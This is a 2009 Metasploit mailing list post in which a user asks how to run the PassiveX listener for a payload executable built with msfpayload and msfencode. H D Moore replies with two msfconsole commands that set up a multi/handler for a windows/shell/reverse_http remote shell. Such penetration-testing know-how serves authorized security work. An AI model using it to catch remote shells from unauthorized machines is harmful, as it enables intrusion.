Metasploit mailing list archives

PassiveX Listener


From: hdm at metasploit.com (H D Moore)
Date: Wed, 10 Jun 2009 08:18:00 -0500

On Wed, 10 Jun 2009 04:51:13 -0500, Jamie Penney <jamie.penney at gmail.com>  
wrote:

Hi!
Does anyone know off the top of their head how run the PassiveX
listener without actually sending any exploit. For example, if I use
msfpayload piped to msfencode to create an .exe file containing the
PassiveX stage 1 code and run this manually I would need the listener
to be running on the other end.


msf> use exploit/multi/handler
msf> set PAYLOAD windows/shell/reverse_http

-HD


Current thread: